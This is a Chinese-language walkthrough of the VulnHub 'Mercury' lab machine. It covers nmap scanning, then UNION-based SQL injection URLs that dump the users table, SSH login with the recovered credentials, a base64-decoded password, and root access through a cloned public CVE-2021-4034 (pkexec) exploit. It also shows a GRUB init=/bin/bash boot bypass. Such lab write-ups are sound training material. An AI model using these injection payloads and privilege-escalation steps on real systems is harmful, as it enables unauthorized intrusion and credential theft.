Vulnhub-Mercury
Mercury靶机下载:https://www.vulnhub.com/entry/the-planets-mercury,544/
攻击机:KALI
打开虚拟机发现无法获取地址(不知道是不是普遍现象😅)

重启后在开机时长按shift

选择Advanced options for Ubuntu

进入后按e

将ro quiet更改为rw signie init=/bin/bash后按ctrl+x进入系统,输入: lsb_release -a 系统发行版本

使用vi /etc/netplan/00-installer-config.yaml看到网卡名有问题并修改


重启后正常
信息搜集
在KALI中使用ARP-SCAN确认靶机IP
arp-scan -l

使用NMAP扫描端口
nmap -A -p 1-65535 192.168.122.136

发现只有22和8080端口

尝试构造错误,查看是否有debug

发现三个页面,尝试打开前两个,都没什么有价值的内容
访问http://192.168.122.136:8080/mercuryfacts/显示如下页面

漏洞攻击
点击Load a fact发现疑似SQL注入点



尝试查询数据库名

利用数据库名查表名
http://192.168.122.136:8080/mercuryfacts/-1%20union%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='mercury'/

利用表名查询字段
http://192.168.122.136:8080/mercuryfacts/-1%20union%20select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'/

利用字段名查具体数据,得到几组用户名密码
http://192.168.122.136:8080/mercuryfacts/-1%20union%20select%20group_concat(username,0x2d,password)%20from%20users/

尝试SSH登录,最后使用webmaster-mercuryisthesizeof0.056Earths连上了

ll发现目录下的flag

查看其他文件,在mercury_proj/notes.txt下发现一个用户名和base64加密的密码


解密后得到mercurymeandiameteris4880km

切换成功
提权
查找有权限的命令
find / -perm -u=s -type f 2>/dev/null

经搜索发现最下面一个存在CVE-2021-4034提权漏洞
使用git clone https://github.com/berdav/CVE-2021-4034

执行make命令后生产cve-2021-4034*

直接执行后提权成功
使用find命令查找flag后打开
find / -name "*flag*"


浙公网安备 33010602011771号